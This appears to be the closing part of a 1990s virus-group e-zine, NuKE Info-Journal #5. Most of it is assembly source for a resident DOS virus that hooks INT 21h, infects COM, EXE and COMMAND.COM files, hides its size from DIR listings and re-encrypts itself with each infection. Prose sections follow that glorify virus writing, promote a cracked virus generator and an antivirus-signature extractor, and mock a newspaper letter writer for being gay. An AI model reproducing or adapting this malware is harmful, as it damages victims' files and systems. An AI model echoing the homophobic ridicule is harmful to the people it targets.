        Mov     Word ptr Ds:[Di+12h], Ax                                   
        Mov     Es, Ax                                                     
        Sub     Ax, 1000h                                                  
        Mov     Word ptr Cs:[Bx+Dos_Seg-2], Ax                             
        Push    Cs                                                         
        Pop     Ds                                                         
        Mov     Si, Bx                                                     
        Mov     Cx, offset Start_Code                                      
        Cld                                                                
        Rep     Movsb                                                      
        Mov     Ds, Cx                                                     
        Cli                                                                
        Mov     Word ptr Ds:[21h*4], offset New_21                         
        Mov     Word ptr Ds:[21H*4]+2, Es                                  
        Sti                                                                
        Mov     Ax, 4BFFh                                                  
        Push    Bx                                                         
        Int     21h                                                        
        Pop     Bx                                                         
        Pop     Ds                                                         
        Push    Ds                                                         
        Pop     Es                                                         
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Run_Prog:                                                                  
        Lea     Si, [Bx].Start_Code                                        
        Mov     Di, 0100h                                                  
        Cmp     Bx, Di                                                     
        Jb      Run_Exe                                                    
                                                                           
Run_COM:                                                                   
        Push    Di                                                         
        Movsw                                                              
        Movsw                                                              
        Ret                                                                
                                                                           
Run_EXE:                                                                   
        Mov     Ax, Es                                                     
        Add     Ax, 0010h                                                  
        Add     Word ptr Cs:[Si+02], Ax                                    
        Add     Word ptr Cs:[Si+04], Ax                                    
        Cli                                                                
        Mov     Sp, Word ptr Cs:[Si+06]                                    
        Mov     Ss, Word ptr Cs:[Si+04]                                    
        Sti                                                                
        Jmp     Dword ptr Cs:[Si+00]                                       
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Check_Present:                                                             
        Inc     Ax                                                         
        Iret                                                               
                                                                           
New_21: Cmp     Ax, 0FFFFh              ; Checking if resident ?           
        Je      Check_Present                                              
        Cmp     Ah, 4Bh                 ; Executing a program ?            
        Je      Load_Program                                               
        Cmp     Ah, 11h                 ; Doing a DIR ?                    
        Je      Find_First                                                 
        Cmp     Ah, 12h                 ; Doing a DIR ?                    
        Je      Find_Next                                                  
        Cmp     Ax, 3D00h               ; Opening a file ?                 
        Jne     Run_21                                                     
        Call    Open_File                                                  
Run_21:                                                                    
        Jmpfar  0                       ; Goto vector 21h                  
Saved_21        Equ     $-4                                                
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Find_First:                                                                
Find_Next:                                                                 
        Push    Bp                                                         
        Mov     Bp, Sp                                                     
        Cmp     Word ptr [Bp+04], 1234h                                    
Dos_Seg:                                                                   
        Pop     Bp                                                         
        Jb      Run_21                                                     
        Call    Do_21                                                      
        Call    Save_Regs                                                  
        Mov     Ah, 2Fh                                                    
        Call    Do_21                                                      
        Cmp     Byte ptr Es:[Bx], 0FFh                                     
        Je      F20                                                        
        Sub     Bx, +7                                                     
F20:    Mov     Al, Byte ptr Es:[Bx].1Eh                                   
        And     Al, 1Fh                                                    
        Cmp     Al, 1Fh                                                    
        Jne     F00                                                        
        Mov     Dx, Word ptr Es:[Bx].26h                                   
        Mov     Ax, Word ptr Es:[Bx].24h                                   
        Sub     Ax, offset Virus_End                                       
        Sbb     Dx, +00                                                    
        Or      Dx, Dx                                                     
        Jb      F00                                                        
        Mov     Word ptr Es:[Bx].26h, Dx                                   
        Mov     Word ptr Es:[Bx].24h, Ax                                   
F00:    Call    Restore_Regs                                               
        IRet                                                               
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Load_Program:                                                              
        Cmp     Al, 01h                                                    
        Je      Disinfect_DEBUG                                            
        Cmp     Al, 0FFh                                                   
        Je      Infect_COMSPEC                                             
        Call    Infect_File                                                
        Jmp     Run_21                                                     
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Infect_COMMAND:                                                            
        Push    Dx                                                         
        Push    Ds                                                         
        Mov     Dx, offset Command_File                                    
        Push    Cs                                                         
        Pop     Ds                                                         
        Mov     Byte ptr Ds:Command_Flag, 0FFh                             
        Call    Infect_File                                                
        Pop     Ds                                                         
        Pop     Dx                                                         
        Iret                                                               
                                                                           
Infect_COMSPEC:                                                            
        Mov     Ah, 51h                                                    
        Call    Do_21                                                      
        Mov     Es, Bx                                                     
        Mov     Ds, Es:[002Ch]                                             
        Xor     Si, Si                                                     
        Push    Cs                                                         
        Pop     Es                                                         
LP00:   Mov     Di, offset COMSPEC_name                                    
        Mov     Cx, 0004h                                                  
        Rep     Cmpsw                                                      
        Jcxz    LP20                                                       
LP10:   Lodsb                                                              
        Or      Al, Al                                                     
        Jne     LP10                                                       
;       Cmp     Al, Byte ptr [Si]                                          
        Cmp     Byte ptr [Si], 00                                          
        Jne     LP00                                                       
        Jmp     Infect_COMMAND                                             
LP20:   Mov     Dx, Si                                                     
        Mov     Byte ptr Cs:Command_Flag, 0FFh                             
        Call    Infect_File                                                
        IRet                                                               
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Disinfect_DEBUG:                                                           
        Push    Es                                                         
        Push    Bx                                                         
        Call    Do_21                                                      
        Pop     Bx                                                         
        Pop     Es                                                         
        Call    Save_Regs                                                  
        Jb      LP30                                                       
        Xor     Cx, Cx                                                     
        Lds     Si, Dword ptr Es:[Bx].12h                                  
        Push    Ds                                                         
        Push    Si                                                         
        Mov     Di, 0100h                                                  
        Cmp     Si, Di                                                     
        Jl      DI00                                                       
        Ja      LP31                                                       
        Lodsb                                                              
        Cmp     Al, 0E9h                                                   
        Jne     LP31                                                       
        Lodsw                                                              
        Push    Ax                                                         
        Lodsb                                                              
        Cmp     Al, 'O'                                                    
        Pop     Si                                                         
        Jne     LP31                                                       
        Add     Si, 103h                                                   
        Inc     Cx                                                         
        Inc     Cx                                                         
        Pop     Ax                                                         
        Push    Si                                                         
        Push    Ds                                                         
        Pop     Es                                                         
        Jmp     short DI10                                                 
DI00:   Lea     Di, Dword ptr [Bx].0Eh                                     
        Cmp     Word ptr Es:[Di].00h, offset Virus_End+Stack_Size-2        
        Jne     LP31            ; Note 4B01/decrements stack by 2          
DI10:   Lodsb                                                              
        Cmp     Al, 0BBh                                                   
        Jne     LP31                                                       
        Lodsw                                                              
        Push    Ax                                                         
        Lodsw                                                              
        Cmp     Ax, Word ptr Cs:[V04]                                      
        Pop     Si                                                         
        Jne     LP31                                                       
        Add     Si, offset Start_Code-(offset V05-V05_Back)                
        Jcxz    DI15                                                       
        Rep     Movsw                                                      
        Jmp     short DI25                                                 
                                                                           
DI15:   Mov     Ah, 51h                                                    
        Call    Do_21                                                      
        Add     Bx, 0010h                                                  
        Mov     Ax, [Si+06h]                                               
        Dec     Ax                                                         
        Dec     Ax                                                         
        Stosw                                                              
        Mov     Ax, [Si+04h]                                               
        Add     Ax, Bx                                                     
        Stosw                                                              
        Movsw                                                              
        Lodsw                                                              
        Add     Ax, Bx                                                     
        Stosw                                                              
DI25:   Pop     Di                                                         
        Pop     Es                                                         
        Xchg    Cx, Ax                                                     
        Mov     Cx, offset Virus_End                                       
        Rep     Stosb                                                      
        Jmp     short LP32                                                 
                                                                           
LP31:   Pop     Ax                                                         
        Pop     Ax                                                         
LP32:   Xor     Ax, Ax                                                     
        Clc                                                                
LP30:   Call    Restore_Regs                                               
        Retfar  0002h                                                      
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Open_File       Proc    Near                                               
        Call    Save_Regs                                                  
        Mov     Si, Dx                                                     
OF00:   Lodsb                                                              
        Or      Al, Al                                                     
        Je      OF50                                                       
        Cmp     Al, '.'                                                    
        Jne     OF00                                                       
        Mov     Di, offset File_Exts-3                                     
        Push    Cs                                                         
        Pop     Es                                                         
        Mov     Cx, 0003h                                                  
OF10:   Push    Cx                                                         
        Push    Si                                                         
        Mov     Cl, 03h                                                    
        Add     Di, Cx                                                     
        Push    Di                                                         
OF12:   Lodsb                                                              
        And     Al, 5Fh                                                    
        Cmp     Al, Byte ptr Es:[Di]                                       
        Jne     OF15                                                       
        Inc     Di                                                         
        Loop    OF12                                                       
        Call    Infect_File                                                
        Add     Sp, +6                                                     
        Jmp     short OF50                                                 
OF15:   Pop     Di                                                         
        Pop     Si                                                         
        Pop     Cx                                                         
        Loop    OF10                                                       
OF50:   Call    Restore_Regs                                               
        Ret                                                                
Open_File       Endp                                                       
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Infect_File     Proc    Near                                               
        Call    Save_Regs                                                  
        Mov     Ax, 4300h                                                  
        Call    Do_21                                                      
        Jb      IF00                                                       
        Push    Cx                                                         
        And     Cl, 01h                                                    
        Cmp     Cl, 01h                                                    
        Pop     Cx                                                         
        Jne     H00                                                        
        And     Cl, 0FEh                                                   
        Mov     Ax, 4301h                                                  
        Call    Do_21                                                      
H00:    Mov     Ax, 3D02h                                                  
        Call    Do_21                                                      
        Jnb     IF02                                                       
IF00:   Jmp     IFE4                                                       
IF02:   Xchg    Bx, Ax                                                     
        Push    Cs                                                         
        Push    Cs                                                         
        Pop     Ds                                                         
        Pop     Es                                                         
        Mov     Ax, 5700h                                                  
        Call    Do_21                                                      
        Push    Dx                                                         
        Push    Cx                                                         
        And     Cl, 1Fh                                                    
        Cmp     Cl, 1Fh                                                    
        Je      IF05                                                       
        Mov     Dx, offset Exe_Header                                      
        Mov     Cx, offset Exe_Header_End-offset Exe_Header                
        Mov     Ah, 3Fh                                                    
        Call    Do_21                                                      
        Jnb     IF10                                                       
IF05:   Stc                                                                
        Jmp     IFE2                                                       
IF10:   Cmp     Ax, Cx                                                     
        Jne     IF05                                                       
        Xor     Dx, Dx                                                     
        Mov     Cx, Dx                                                     
        Mov     Ax, 4202h                                                  
        Call    Do_21                                                      
        Or      Dx, Dx                                                     
        Jne     IF12                                                       
        Cmp     Ax, offset Virus_End+Stack_Size                            
        Jb      IF05                                                       
IF12:   Cmp     Word ptr Ds:Sign, 'ZM'                                     
        Je      EXE_type                                                   
                                                                           
COM_type:                                                                  
        Cmp     Byte ptr Ds:Sign+3, 'O'                                    
        Je      IF05                                                       
        Cmp     Byte ptr Ds:Command_Flag, 00h                              
        Je      CT00                                                       
        Sub     Ax, offset Virus_End                                       
        Xchg    Dx, Ax                                                     
        Xor     Cx, Cx                                                     
        Mov     Ax, 4200h                                                  
        Call    Do_21                                                      
CT00:   Mov     Si, offset Sign                                            
        Mov     Di, offset Start_Code                                      
        Movsw                                                              
        Movsw                                                              
        Sub     Ax, 0003h                                                  
        Mov     Byte ptr Ds:Sign, 0E9h                                     
        Mov     Word ptr Ds:Sign+1, Ax                                     
        Mov     Byte ptr Ds:Sign+3, 'O'                                    
        Add     Ax, (offset V05-V05_Back)+0103H                            
        Jmp     short IF30                                                 
                                                                           
EXE_type:                                                                  
        Cmp     Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size          
        Je      IF05                                                       
        Cmp     Word ptr Ds:Overlay_Num, 0000h                             
        Jne     IF05                                                       
        Push    Dx                                                         
        Push    Ax                                                         
        Mov     Cl, 04h                                                    
        Ror     Dx, Cl                                                     
        Shr     Ax, Cl                                                     
        Add     Ax, Dx                                                     
        Sub     Ax, Word ptr Ds:Size_Header                                
        Mov     Si, offset Start_Ip                                        
        Mov     Di, offset Start_Code                                      
        Movsw                                                              
        Movsw                                                              
        Mov     Si, offset Stack_Ss                                        
        Movsw                                                              
        Movsw                                                              
        Mov     Word ptr Ds:Start_Cs, Ax                                   
        Mov     Word ptr Ds:Stack_Ss, Ax                                   
        Mov     Word ptr Ds:Stack_Sp, offset Virus_End+Stack_Size          
        Pop     Ax                                                         
        Pop     Dx                                                         
        Push    Ax                                                         
        Add     Ax, offset Virus_End+Stack_Size                            
        Jnb     IF29                                                       
        Inc     Dx                                                         
IF29:   Mov     Cx, 512                                                    
        Div     Cx                                                         
        Mov     Word ptr Ds:File_Size, Ax                                  
        Mov     Word ptr Ds:Remainder, Dx                                  
        Pop     Ax                                                         
        And     Ax, 000Fh                                                  
        Mov     Word ptr Ds:Start_Ip, Ax                                   
        Add     Ax, (offset V05-V05_Back)                                  
                                                                           
IF30:   Mov     Word ptr Ds:V00+1, Ax                                      
        Push    Ds                                                         
        Xor     Si, Si                                                     
        Mov     Ds, Si                                                     
        Mov     Ax, Word ptr Ds:[046Ch]                                    
        Pop     Ds                                                         
        Push    Bx                                                         
        Mov     Byte ptr Ds:V01+1, Ah                                      
        And     Ax, 000Fh                                                  
        Xchg    Bx, Ax                                                     
        Shl     Bx, 01h                                                    
        Mov     Ax, Word ptr [Bx].Random_AL                                
        Mov     Word ptr Ds:V03, Ax                                        
        Mov     Di, offset Real_End                                        
        Mov     Cx, offset Virus_End                                       
        Push    Cx                                                         
        Cld                                                                
        Rep     Movsb                                                      
        Mov     Bx, (offset V05-V05_Back)                                  
        Push    Word ptr [Bx]                                              
        Mov     Byte ptr [Bx+V05_Back], 0C3h                               
        Push    Bx                                                         
        Xor     Byte ptr Ds:([Bx+V02+1])-(offset V05-V05_Back), 28h        
        Add     Bx, offset Real_End     ; Toggle ADD [BX],AL/SUB [BX],AL   
        Call    V04                                                        
        Pop     Bx                                                         
        Pop     Word ptr [Bx]                                              
        Mov     Dx, offset Real_End                                        
        Pop     Cx                                                         
        Pop     Bx                                                         
        Mov     Ah, 40h                                                    
        Call    Do_21                                                      
IFE1:   Jb      IFE2                                                       
        Xor     Dx, Dx                                                     
        Mov     Cx, Dx                                                     
        Mov     Ax, 4200h                                                  
        Call    Do_21                                                      
        Jb      IFE2                                                       
        Mov     Dx, offset Exe_Header                                      
        Mov     Cx, offset Exe_Header_End-offset Exe_Header                
        Mov     Ah, 40h                                                    
        Call    Do_21                                                      
IFE2:   Pop     Cx                                                         
        Pop     Dx                                                         
        Jb      IFE3                                                       
        Cmp     Byte ptr Ds:Command_Flag, 0FFh                             
        Je      IFE3                                                       
        Or      Cl, 1Fh                                                    
IFE3:   Mov     Ax, 5701h                                                  
        Call    Do_21                                                      
        Mov     Ah, 3Eh                                                    
        Call    Do_21                                                      
IFE4:   Mov     Byte ptr Cs:Command_Flag, 00h                              
        Call    Restore_Regs                                               
        Ret                                                                
Infect_File     Endp                                                       
                                                                           
Do_21   Proc    Near                                                       
        Pushf                                                              
        Call    Dword ptr Cs:Saved_21                                      
        Ret                                                                
Do_21   Endp                                                               
                                                                           
Save_Regs:                                                                 
        Push    Bp                                                         
        Mov     Bp, Sp                                                     
        Push    Bx                                                         
        Push    Cx                                                         
        Push    Dx                                                         
        Push    Si                                                         
        Push    Di                                                         
        Push    Ds                                                         
        Push    Es                                                         
        Pushf                                                              
        Xchg    [Bp+02], Ax                                                
        Push    Ax                                                         
        Mov     Ax, [Bp+02]                                                
        Ret                                                                
                                                                           
Restore_Regs:                                                              
        Pop     Ax                                                         
        Xchg    [Bp+02], Ax                                                
        Popf                                                               
        Pop     Es                                                         
        Pop     Ds                                                         
        Pop     Di                                                         
        Pop     Si                                                         
        Pop     Dx                                                         
        Pop     Cx                                                         
        Pop     Bx                                                         
        Pop     Bp                                                         
        Ret                                                                
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
Random_AL:                                                                 
        Inc     Al                      ; 0                                
        Dec     Al                      ; 1                                
        Inc     Ax                      ; 2                                
        Inc     Ax                                                         
        Dec     Ax                      ; 3                                
        Dec     Ax                                                         
        Add     Al, Cl                  ; 4                                
        Sub     Al, Cl                  ; 5                                
        Xor     Al, Cl                  ; 6                                
        Xor     Al, Ch                  ; 7                                
        Not     Al                      ; 8                                
        Neg     Al                      ; 9                                
        Ror     Al, 01h                 ; A                                
        Rol     Al, 01h                 ; B                                
        Ror     Al, Cl                  ; C                                
        Rol     Al, Cl                  ; D                                
        Nop                             ; E                                
        Nop                                                                
        Add     Al, Ch                  ; F                                
                                                                           
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; 
                                                                           
COMSPEC_name    db      'COMSPEC='                                         
COMMAND_file    db      '\COMMAND.COM',0                                   
FILE_Exts       db      'COMEXEOVL'                                        
NUM_Exts        equ     3                                                  
                                                                           
Start_Code      dw      00000h                                             
                dw      0FFF0h                                             
Start_Stack     dw      ?                                                  
                dw      0FFFFh                                             
                                                                           
        Org     400h                                                       
Virus_End:                                                                 
                                                                           
Saved_24        dw      ?,?                                                
                                                                           
Command_Flag    db      0                                                  
                                                                           
Temp            dw      ?                                                  
                                                                           
Exe_Header:                                                                
Sign            dw      ?                                                  
Remainder       dw      ?                                                  
File_Size       dw      ?                                                  
Num_Real        dw      ?                                                  
Size_Header     dw      ?                                                  
Min_Above       dw      ?                                                  
Max_Above       dw      ?                                                  
Stack_Ss        dw      ?                                                  
Stack_Sp        dw      ?                                                  
CheckSum        dw      ?                                                  
Start_Ip        dw      ?                                                  
Start_Cs        dw      ?                                                  
Display_Real    dw      ?                                                  
Overlay_Num     dw      ?                                                  
Exe_Header_End:                                                            
                                                                           
Real_End:                                                                  
                                                                           
Code    Ends                                                               
        End     Virus_Begin                                                
;==========================================================================
===========================================================================
Evolution of The Cyberculture                                              
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                              
                                                                           
Something's happening here. What it is ain't exactly clear. There's a      
punk with a computer over there, tellin' me I got to beware...             
                                                                           
These days, a new breed of young politicized radicals, known as            
cyberpunks, roam a techno-underground. These cyberpunks are computer       
cowboys riding the trails of cyberspace. Circumventing software barriers   
in search of information and services or sometimes just to wreak a little  
mischievous havoc. They've got the equipment and, they say, the technical  
know how to slip into virtually any computer system and affect changes     
with global ramifications. They could effectively cripple the economy or   
shut down communications systems round the world. Cyberpunks hold the      
potential for becoming the most powerful countercultural force ever.       
                                                                           
The government has launched at least two major operations, one in 1990     
called Operation Sundevil, to quash the movement. As Secret Service Special
Agent John F. Lewis put it, "There are some very talented individuals who  
are unfortunately misdirecting their energies. But to say they're leaps and
bounds ahead of law enforcement personnel isn't true."                     
                                                                           
Our CyberCulture has been built by the best, it perhaps was started by this
tall and slender person, wearing black jeans and sporting a pair of John   
Lennon Specs, we know him as Michael Synergy. Synergy was your basic       
computer punk, he spent his time exploring cyberspace, staging his own     
quiet protests by going where he wanted, when he wanted. Synergy became so 
adept at infiltrating systems that he's become a legend, today he remains  
something of an icon in the techno-underground.                            
                                                                           
Synergy explains that most of his adventures was to become educated. At    
that time there wasn't a C-Compiler on microcomputers, so he'd break into  
Bell Labs just to learn C. Most hackers, Synergy says, use their talents   
simply to learn. In the very beginning Synergy managed to slip into a      
supposedly secure top-secret computer network run by the intelligence      
community and the Department of Defense (DOD), when the DOD took him out   
of cyber-circulation and brought him in to conduct "penetration testing    
and security design" for national Security Agency, Secret Service, and     
FBI, as well as the DOD.                                                   
                                                                           
Synergy has created a huge spark, that has developed to our current        
Cyberpunk movement. Science Fiction took off, and we had the beginning of  
with William Gibson's _Necromancer_ in 1984. The well-known movie          
_War Games_ was amongst the first to draw ME (Rock Steady) into the        
Cyberpunk world. Other Cyberpunk-oriented works by writers such as Bruce   
Sterling (_Schismatrix_, _Islands in the Net_) Pat Cadigan (_Mindplayers_, 
_Pretty Boy Crossover_) and John Shirly (_Eclipse Crona_) captured SF fans.
Gibson also came back with two more novels, _Count Zero_ and _Mona Lisa    
Overdrive_, as well as an anthology of short stories, _Burning Chrome_.    
                                                                           
Of course we can say this all began in Ridley Scott's 1980 movie           
_Bladerunner_ loosely-based on Philip K. Dick's novel "Do Androids Dream of
Electric Sheep?" The flood has even fallen into the now so-called cyberpunk
bands which have European roots, including Front-242 (Belgium), Laibach    
(Yugoslavia) and Can (Germany).                                            
                                                                           
The flood of culture certainly attracted several punks, many whom now can  
draw their links to such SF culture. However just like "hacker" the term   
"cyberpunk" has also come to mean "computer criminal" and cases like the   
1988 Internet "worm" have undoubtedly fed the crackdown fever. Created by  
25-year-old Robert Morris, the worm shut down some 6,500 computers and     
caused an estimated $150,000 to $200 million worth of damages to computer  
systems nationwide.                                                        
                                                                           
Since then, there have been several instances of what the hackers claim    
are government attempts to suppress the cyberpunk media. Steve Jackson     
Games is a case in point. Secret Service agents raided this small Austin-  
based game manufacturer, publishers of fantasy-role-playing games, in March
of 1990.                                                                   
                                                                           
With the recent arrests of numerous hackers for illegal entry and data     
possession, the battles over control of the electronic frontier and        
hackers' rights are now being waged in courts. One critical issue is       
whether information belongs to a given corporation or government or        
whether it belongs to the world.                                           
                                                                           
Certainly what started off as science fiction isn't science fiction any    
more. The several arrests are meant to make an example, and to perhaps     
scare ourselves back "into place." Of course this is where the NuKE turning
point arrives; rather than hacking ourselves and risking ourselves         
against the lawman, there is the idea of making a program to perhaps work  
like ourselves, its mission to bypass software restrictions and perhaps to 
send a message to all, or to make the world fall upon their knees and go   
crying to Paul Ferguson for help. I can assure you that the cyberpunk      
future is still up for grabs, between utopia and dystopia, and whatever it 
will be it will be a long, hard battle to the end.                         
                                                                           
                        Rock Steady and The NuKE Associates                
===========================================================================
===========================================================================
The Truth About Gary...                                                    
~~~~~~~~~~~~~~~~~~~~~~~                                                    
                                                                           
The following is an actual letter to the editor from the January 18th      
issue of the _Chicago Tribune_ (sec. 1, p. 12).  I am not making this up.  
For your convenience, I've typed it up just as it appears in the paper:    
                                                                           
                                                                           
On tolerance                                                               
                                                                           
  OAK   PARK   ---   This  is  in                                          
response  to   "A  battle for the                                          
military's  soul,"   by    Robert                                          
Maginnis.                                                                  
  How  nice  of  you,  sir,  as a                                          
lieutenant colonel, to be able to                                          
express    the    views   of   an                                          
organization   of   close   to  1                                          
million employees! I also respect                                          
that    you,     as    a   stated                                          
heterosexual,   also   know   the                                          
tendencies   of  the appoximately                                          
2.56  million  homosexuals in the                                          
United  States.   And  I,  having                                          
proudly  served  seven  years  in                                          
the military, was doing it wrong!                                          
  I    should    have,   as     a                                          
homosexual   being,   been   more                                          
promiscuous,    tried    suicide,                                          
become  an  alcoholic, contracted                                          
a  sexual  disease,  had close to                                          
500  partners (wow!),  and abused                                          
children to boot.                                                          
  As  to  the   transfusions   of                                          
blood,  I  guess  the rest of the                                          
world is less risky, with 90 per-                                          
cent  of  HIV  infections  world-                                          
wide being within the heterosexual                                         
sphere.   Furthermore,  the  ter-                                          
minology   you  attempt  to  use,                                          
pro-gay sensitivity  or re-educa-                                          
tion  classes,  is  laughable.                                             
  All   we 're   asking  is to be                                          
treated  with  respect  as  human                                          
beings.  The  rest  of  the world                                          
lives  with these gay people; why                                          
in  the hell shouldn't you?  Rec-                                          
ognize  the  right to be human in                                          
all our ways.                                                              
                                                                           
               Gary Watson                                                 
                                                                           
               ^^^^^^^^^^^                                                 
Aha!  So the truth finally comes out Gary!  We all knew it all along!      
I'm just glad that you came out of the closet by submitting your letter    
to a major newspaper...                                                    
                                                                           
                        Nowhere Man/NuKE                                   
===========================================================================
===========================================================================
Files Included With NuKE Info-Journal #5                                   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                   
                                                                           
DETECTOR.ZIP                                                               
~~~~~~~~~~~~                                                               
Included with this kit are a few .ZIPs that our two good friends           
wrote. The first is called DETECTOR.ZIP. It consists of a                  
"strain extractor" by Savage Beast/NuKE. This software will be able        
to help you to catch your funny viruses when no scanner finds them.        
Inside the .ZIP there are two files, TEST1.COM and TEST2.COM. They         
should be infected, then reset your computer and execute the               
DECTECTOR program. Have fun and use the program in good health!            
                                                                           
Provided by:  Savage Beast                                                 
                                                                           
                                                                           
GENVIRUS.ZIP                                                               
~~~~~~~~~~~~                                                               
GenVirus is a virus generator developed in France. This program was        
ORIGINALLY in French, and "crippled," meaning you had to send the          
dickweed programmer mondo money for a legit copy. So we gave it            
to Rock Steady, who cracked the shit out of the file! Being in Canada      
and stranded in Quebec (French-Pepper land), Rock Steady was able to       
translate the WHOLE GenVirus program into English! It was tough, being     
written in C++, but once you live and breath ASM its just a matter of      
time. Anyhow thanks to Savage Beast for getting us a copy of this program! 
REMEMBER: ALL the viruses created with GenVirus are UNDETECTABLE!          
The program ONLY compiles binary code, and attaches the virus to a         
"dummy" .COM file, but nevertheless it was developed AFTER VCL v1.0,       
(VCL changed the WHOLE WORLD!), and still goes undetectable, as people     
never were able to crack the program...<hehe>                              
                                                                           
Provided by:  Savage Beast                                                 
Cracked by:   Rock Steady                                                  
                                                                           
                                                                           
MCAFEE.STR                                                                 
~~~~~~~~~~                                                                 
Is a Product of Screaming Radish from Australia that extracts all virus    
signatures from any version of McAfee Scan. We are unable to release the   
product in this info journal as McAfee may restructure their virus format  
of saving virus signatures, as they can do so, by simple changing one or   
two small adjustments, therefore this program is not available to the      
general public. But if you want to get a copy call any of the NuKE Support 
systems.                                                                   
                                                                           
Provided: Screaming Radish                                                 
                                                                           
                        The NuKE Associates                                
===========================================================================
===========================================================================
              NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE                      
              uK                                   E-                      
              KE              CREDITS              -N                      
              E-                                   Nu                      
              -NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuKE-NuK                      
                                                                           
NuKE would like to send its extended thanks to all supporters and members  
that have put themselves on the line to be with us. Mainly:                
                                                                           
Death Angel           (416)   [Thanks for your support! (And source!)]     
Rock Steady           (514)   [You have the right to remain silent. You..] 
Pure Energy           (514)   [I have a Board? Naaa...]                    
Silent Shadow         (514)   [What?, Who?, How?, When?, Where?, Why?]     
Nowhere Man           (708)   [See, no capital "W" Nowhere!]               
ARiSToTLE             (804)   [TRISKAIDEKAPHOBIA - one of a kind dude.]    
FireCracker           (804)   [Huh, VGA? Whats VGA? Gimme my money back!]  
Dark Angel            (819)   [Can't have a group without you, huh?]       
Savage Beast          (+41)   [Hey where's my limo???]                     
Ford Fairlane         (+46)   [That's for staying on our side!]            
Tormentor/DY          (+46)   ["Fame" is truely an evil]                   
Phrozen Doberman      (+61)   [Gooooood Daaaaay...]                        
Screaming Radish      (+61)   [Beastiality you say?...humm]                
TäLöN                 (+61)   [Where's my XXX calendar of the AVers?]      
Shidaq Arl'hur        (+61)   [Welcome aboard mate!]                       
The Wierd One         (+61)   [FCB, how's it taste?]                       
The Dark Elf          (+61)   [Scan strings, who needs scan strings?]      
                                                                           
(Ordered by area/country code.  We don't like to play favourates!)         
                                                                           
Anyhow if I missed anyone SIMPLY send me e-mail, no credit ruining, no     
letter bombs, PLEASE! But I believe I put in everyone that have contributed
alot to the NuKE Team, and we thank you in return.                         
                                                                           
                                                                           
NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites - NuKE Sites
---------------------------------------------------------------------------
├───[BBS Name]───────[Phone Number][Modem]──[SysOp]────────────[NuKE-Net]─┤
 Cybernetic Voilence. 514-425-4540  V32Bis  Pure Energy      American HUB  
 Total Mayhem........+613-ASK-NUKE  HST/DS  Phrozen Doberman Australian HUB
 Enigma E:N:U:N.....+41-22-3400329  V32Bis  Savage Beast     European HUB  
├─────────────────────────────────────────────────────────────────────────┤
                                                                           
I listed only the HUB systems, as that is always where you can reach any   
of us for sure. We do have many other systems, but since this file will    
not be encrypted I didn't wish to post them for reasons of security. If you
wish to join NuKENET simply call up the hub(s) closest to your area, and   
you will be joined upon to it.                                             
                                                                           
Currently NuKENET sites are located in Montreal, Ottawa/Hull, Toronto,     
Detroit, Chicago, Philadelphia, Richmond, Stockholm, Göteborg, Geneva,     
Amsterdam, Sofia, Melbourne, and Brisbane.                                 
                                                                           
Remember, main rules for NuKENET are that you must call the system up every
2-3 days, anything less will purge you from our net; no illegalities, no   
codes and material like that (they will be turned over to the appropriate  
law enforcement!). And we insist on an active system -- one post per month 
ain't our idea of active.                                                  
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================